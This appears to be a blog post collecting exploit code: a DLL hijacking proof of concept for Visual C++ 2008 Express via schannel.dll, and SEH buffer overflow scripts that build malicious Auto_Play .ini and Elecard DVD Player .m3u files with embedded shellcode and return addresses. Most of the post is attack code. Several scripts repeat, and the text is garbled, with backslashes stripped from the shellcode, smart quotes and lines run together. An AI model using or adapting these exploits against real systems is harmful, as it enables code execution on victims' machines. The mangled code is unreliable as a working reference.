Visual C++ 2008 Express Edition (schannel.dll) DLL Hijacking Exploit

/*
Visual C++ 2008 Express Edition (schannel.dll)  DLL Hijacking Exploit

Vendor: Microsoft.
Product Web Page: http://www.microsoft.com/
Affected Version: Visual C++ 2008 Express Edition (x86) 9.0.30729.1 SP

Summary: Microsoft Visual C++ (often abbreviated as MSVC or VC++)
is a commercial, non-free integrated development environment (IDE)
product from Microsoft for the C, C++, and C++/CLI programming
languages. It has tools for developing and debugging C++ code,
especially code written for the Microsoft Windows API, the DirectX API,
and the Microsoft .NET Framework.

Desc: Vulnerable extensions are .inc, .def, .disco, and .dtd
using schannel.dll libraries.

Tested on Microsoft Windows XP Professional SP3 (EN)
Compalied with Visual C++ 2008 Express Edition (x86)

Vulnerability discovered by Dame Jovanoski (badc0re)
Mail:jovanoski@zeroscience.mk

Zero Science Lab – http://www.zeroscience.mk

23.02.2011

*/

#include <windows.h>
int hax0r()
{
MessageBox(0, TEXT(“Hax0r”), TEXT(“DLL Message”), MB_OK);
return 0;
}

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
hax0r();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56”);head=(“x5bx47x65x6ex65x72x61x6cx5dx0dx0ax54x69x74x6cx65”
“x3dx41x20x73x61x6dx70x6cx65x20x6fx66x20x77x68x61”
“x74x20x41x75x74x6fx50x6cx61x79x20x63x61x6ex20x64”
“x6fx21x0dx0ax49x63x6fx6ex3dx2ex5cx61x75x74x6fx70”
“x6cx61x79x2ex69x63x6fx0dx0ax53x74x61x72x74x75x70”
“x53x6fx75x6ex64x3dx2ex5cx64x72x75x6dx72x6fx6cx6c”
“x2ex77x61x76x0dx0ax45x78x69x74x53x6fx75x6ex64x3d”
“x2ex5cx65x78x70x6cx6fx64x65x2ex77x61x76x0dx0ax4e”
“x75x6dx62x65x72x4fx66x42x75x74x74x6fx6ex73x3dx37”
“x0dx0ax42x61x63x6bx67x72x6fx75x6ex64x42x69x74x6d”
“x61x70x3dx2ex5cx73x70x6cx61x73x68x2ex6ax70x67x0d”
“x0ax4ex75x6dx62x65x72x4fx66x43x6fx6dx62x6fx73x3d”
“x31x0dx0ax0dx0ax5bx42x75x74x74x6fx6ex31x5dx0dx0a”
“x43x6fx6dx6dx61x6ex64x54x79x70x65x3dx31x0dx0ax43”
“x6fx6dx6dx61x6ex64x3dx65x78x70x6cx6fx72x65x72x2e”
“x65x78x65x0dx0ax46x6cx79x62x79x53x6fx75x6ex64x3d”
“x2ex5cx68x6fx76x65x72x73x65x6cx2ex77x61x76x0dx0a”
“x4cx65x66x74x3dx38x33x0dx0ax54x6fx70x3dx31x33x0d”
“x0ax54x65x78x74x43x6fx6cx6fx72x3dx32x35x35x2cx30”
“x2cx30x0dx0ax48x69x67x68x6cx69x67x68x74x43x6fx6c”
“x6fx72x3dx32x35x35x2cx32x35x35x2cx30x0dx0ax43x61”
“x70x74x69x6fx6ex3dx52x75x6ex20x57x69x6ex64x6fx77”
“x73x20x45x78x70x6cx6fx72x65x72x0dx0ax46x6fx6ex74”
“x53x69x7ax65x3dx32x34x0dx0ax46x6fx6ex74x4ex61x6d”
“x65x3d”)
junk=”x41″*32
junk1=”x41″*92
nseh=”xebx06x90x90″
seh=”x62xcex86x7c”#x62xcex86x7c pop pop ret
esp=”x7bx46x86x7c”#x7bx46x86x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”)
from struct import *
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56″);
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk1=”x42″*4
nseh=”x43″*4#”xebx0ax90x90″
seh=”x44″*4#”x7ax15xbdx77″#”xebx0ax90x90″
seh1=”x90″*4#77bd157a#”0x00463EB6″
junk=”x41″*19995
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
print “File cannot be created”

Link

#!/usr/bin/python
#
#
# ElecardDVDPlayer 5.6 Local Buffer Overflow PoC (SEH)
#
#
# Vendor: Elecard Group
# Product web page: http://www.elecard.com
# Affected version: 5.6
#
# Summary: Elecard MPEG Player is a high-quality full-featured multimedia
# player supporting the newest formats, #designed to provide you with
# video and audio playback.
#
# Desc: The program suffers from a buffer overflow (SEH) vulnerability
# when opening playlist file (.m3u), as a result of adding extra
# bytes.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by: badc0re (Dame Jovanoski)
#
#
# Advisory ID: ZSL-2011-4998
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4998.php
#
# 23.02.2011
#
# Special Thanks to:
#
# LiquidWorm (the master :P)
# Corelanc0der(great tutorials and forum)
#f=open(“default5.m3u”,”w”)
print “Creating expoit.”
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk=”x42″*4
nseh=”x43″*4
seh=”x44″*4
seh1=”x90″*4
junk1=”x41″*20165
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+junk)
f.close()
print “File created”
except:
print “File cannot be created”
#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56”);head=(“x5bx47x65x6ex65x72x61x6cx5dx0dx0ax54x69x74x6cx65”
“x3dx41x20x73x61x6dx70x6cx65x20x6fx66x20x77x68x61”
“x74x20x41x75x74x6fx50x6cx61x79x20x63x61x6ex20x64”
“x6fx21x0dx0ax49x63x6fx6ex3dx2ex5cx61x75x74x6fx70”
“x6cx61x79x2ex69x63x6fx0dx0ax53x74x61x72x74x75x70”
“x53x6fx75x6ex64x3dx2ex5cx64x72x75x6dx72x6fx6cx6c”
“x2ex77x61x76x0dx0ax45x78x69x74x53x6fx75x6ex64x3d”
“x2ex5cx65x78x70x6cx6fx64x65x2ex77x61x76x0dx0ax4e”
“x75x6dx62x65x72x4fx66x42x75x74x74x6fx6ex73x3dx37”
“x0dx0ax42x61x63x6bx67x72x6fx75x6ex64x42x69x74x6d”
“x61x70x3dx2ex5cx73x70x6cx61x73x68x2ex6ax70x67x0d”
“x0ax4ex75x6dx62x65x72x4fx66x43x6fx6dx62x6fx73x3d”
“x31x0dx0ax0dx0ax5bx42x75x74x74x6fx6ex31x5dx0dx0a”
“x43x6fx6dx6dx61x6ex64x54x79x70x65x3dx31x0dx0ax43”
“x6fx6dx6dx61x6ex64x3dx65x78x70x6cx6fx72x65x72x2e”
“x65x78x65x0dx0ax46x6cx79x62x79x53x6fx75x6ex64x3d”
“x2ex5cx68x6fx76x65x72x73x65x6cx2ex77x61x76x0dx0a”
“x4cx65x66x74x3dx38x33x0dx0ax54x6fx70x3dx31x33x0d”
“x0ax54x65x78x74x43x6fx6cx6fx72x3dx32x35x35x2cx30”
“x2cx30x0dx0ax48x69x67x68x6cx69x67x68x74x43x6fx6c”
“x6fx72x3dx32x35x35x2cx32x35x35x2cx30x0dx0ax43x61”
“x70x74x69x6fx6ex3dx52x75x6ex20x57x69x6ex64x6fx77”
“x73x20x45x78x70x6cx6fx72x65x72x0dx0ax46x6fx6ex74”
“x53x69x7ax65x3dx32x34x0dx0ax46x6fx6ex74x4ex61x6d”
“x65x3d”)
junk=”x41″*32
junk1=”x41″*92
nseh=”xebx06x90x90″
seh=”x62xcex86x7c”#x62xcex86x7c pop pop ret
esp=”x7bx46x86x7c”#x7bx46x86x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”)
from struct import *
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56″);
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk1=”x42″*4
nseh=”x43″*4#”xebx0ax90x90″
seh=”x44″*4#”x7ax15xbdx77″#”xebx0ax90x90″
seh1=”x90″*4#77bd157a#”0x00463EB6″
junk=”x41″*19995
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
print “File cannot be created”

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: